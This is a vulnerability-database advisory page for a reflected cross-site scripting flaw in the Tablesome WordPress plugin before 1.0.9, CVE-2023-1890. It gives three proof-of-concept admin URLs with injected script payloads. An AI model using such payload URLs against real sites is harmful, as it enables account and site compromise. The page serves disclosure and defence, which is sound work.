Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
wpexploitTaurus OmarWPEX-ID:8EF64490-30CD-4E07-9B7C-64F551944F3D
HistoryApr 24, 2023 - 12:00 a.m.

Tablesome < 1.0.9 - Reflected XSS

2023-04-2400:00:00
Taurus Omar
63
tablesome
reflected xss
admin
feature/tracking notice
url
exploit

EPSS

0.003

Percentile

70.9%

JSON

The plugin does not escape various generated URLs, before outputting them in attributes when some notices are displayed, leading to Reflected Cross-Site Scripting

Make a logged in admin open one of the URL below when the feature/tracking notice has not been dismissed yet

https://example.com/wp-admin/edit.php?post_type=tablesome_cpt&a%22%3E%27%3E%3Cdetails%2Fopen%2Fontoggle%3Dconfirm%28%27XSS%27%29%3E
https://example.com/wp-admin/edit.php?post_type=tablesome_cpt&tablesome_feature_notice_dismissed=1&</script><script>alert(/XSS/)</script>
https://example.com/wp-admin/edit.php?post_type=tablesome_cpt&can_track_tablesome_events=1&</script><script>alert(/XSS/)</script>

Related

wpvulndb 1
cve 1
packetstorm 1
prion 1
cvelist 1
nuclei 1
nvd 1
wpvulndb
wpvulndb
Tablesome < 1.0.9 - Reflected XSS
2023-04-24 00:00:00
cve
cve
CVE-2023-1890
2023-05-15 13:15:10
packetstorm
packetstorm
WordPress Tablesome Cross Site Scripting
2023-07-25 00:00:00
prion
prion
Cross site scripting
2023-05-15 13:15:00
cvelist
cvelist
CVE-2023-1890 Tablesome < 1.0.9 - Reflected XSS
2023-05-15 12:15:41
nuclei
nuclei
Tablesome < 1.0.9 - Cross-Site Scripting
2023-07-07 09:38:49
nvd
nvd
CVE-2023-1890
2023-05-15 13:15:10

EPSS

0.003

Percentile

70.9%

JSON
Related for WPEX-ID:8EF64490-30CD-4E07-9B7C-64F551944F3D
wpvulndb1cve1packetstorm1prion1cvelist1nuclei1nvd1